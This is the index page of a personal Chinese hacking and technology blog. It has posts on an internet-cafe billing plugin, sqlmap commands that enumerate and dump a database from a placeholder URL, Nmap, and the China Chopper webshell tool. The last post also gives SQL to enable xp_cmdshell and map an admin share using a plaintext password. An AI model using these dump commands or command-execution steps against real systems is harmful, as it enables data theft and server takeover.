本博客为个人主页,所有日志均为原创,请尊重作者感情。
“即使赚得了全世界,却失去了自己,又有什么意义呢。”——本人腾讯微博号:HKFXNET
在许多年前创建红客防线,简称红防 本人企鹅交流号:3925993(此Q为本人唯一交流专用号,其它号非本人账号)请勿发表任何带网址或号码等广告,本站启用严格过滤广告机制。
申请友情链接请先做好我的,注册账号后,再点首页侧边的“申请链接”,数日内,我查看到便会通过,无需留言。
本博客所有原创文字商业引用需征得作者授权,请与博主联系洽谈,网络转载作者期望勿丢失出处。


简单纯朴的唯技术个人博客、记录人生成长的点点滴滴、让我们共同构造简单的线条划出一片蔚蓝的天空(给我致信)

[置顶] WebSafe Scan

[不指定 2013/09/16 21:45 | by admin ]

万象插件

[不指定 2018/01/10 10:03 | by admin ]
网上比较少能找到万象插件,故止本博主博爱大无私地分享一个万象插件wx2008插件哈。。
最关键的要选择计费所在目录,毕竟万象插件不太智能,我们村里养猪的二狗子都懂装了,你智商应该不会比他低吧。
点击在新窗口中浏览此图片
万象插件wx2008glwplug
下载文件
这个文件只能在登入之后下载。请先 注册登入

万象2008,OL版过滤王实名插件
下载文件
这个文件只能在登入之后下载。请先 注册登入

Sqlmap检测SQL注入攻击

[不指定 2017/12/01 13:21 | by admin ]
测试SQL注入:
# sqlmap -u http://www.te...ndex.php?id=1 --dbs
自动探测数据库类型和漏洞,如果成功会列出数据库:
点击在新窗口中浏览此图片

获得某个数据库中的表:
# sqlmap -u sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables

获得表的字段:
# sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables -T some_table --columns

下载某一字段的数据:
# sqlmap -u http://www.te...ndex.php?id=1 --dbs -D some_db --tables -T some_table --columns -C some_col --dump

这款工具也很好用,用来检测SQL漏洞注入比较精确,国内也有好几个SQL注入工具,博主以前也写过注入攻击工具哈;
神器下载地址这里就不提供了,自己搜索吧,反正也没多少人评论留意观看哈。

Nmap 进行 Web 漏洞扫描

[不指定 2017/12/01 12:00 | by admin ]
点击在新窗口中浏览此图片
很久没上博客,再提供款工具吧,亲测很好用,可以扫描端口及其它漏洞,比喻UDP/TCP端口;
点击:官网下载

中国菜刀

[不指定 2017/12/01 11:49 | by admin ]
点击在新窗口中浏览此图片
功夫最高也怕菜刀哈,很久没上博客了,分享前几年的渗透工具吧;一句话后门原先为网站管理用,因方便管理,故此给黑客作利用,而它本身非木马;
点击:官方下载
1.如果没有启用xp_cmdshell,请执行以下启用,本人亲自操刀备份到内网其它机器通过,如果对您有用,请评论点赞!
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

2.创建映射

exec master..xp_cmdshell 'net use Z: \\192.168.1.110\D$\Backup 123456 /user:192.168.1.110\administrator'

注:服务器密码123456;用户名是administrator 这里需要你建立一个用户,否则无法登录1.110这台机器,同时该文件需要共享
这里是在数据库映射一个虚拟Z盘,当你备份时可以手选Z盘或者用以下命令备份都可以,我这里是按界面操作备份的。
3.备份数据库
  
backup database test to disk='\\192.168.1.110\D$\Backup\test.bak' with init
分页: 1/8 第一页 1 2 3 4 5 6 7 8 下页 最后页 [ 显示模式: 摘要 | 列表 ]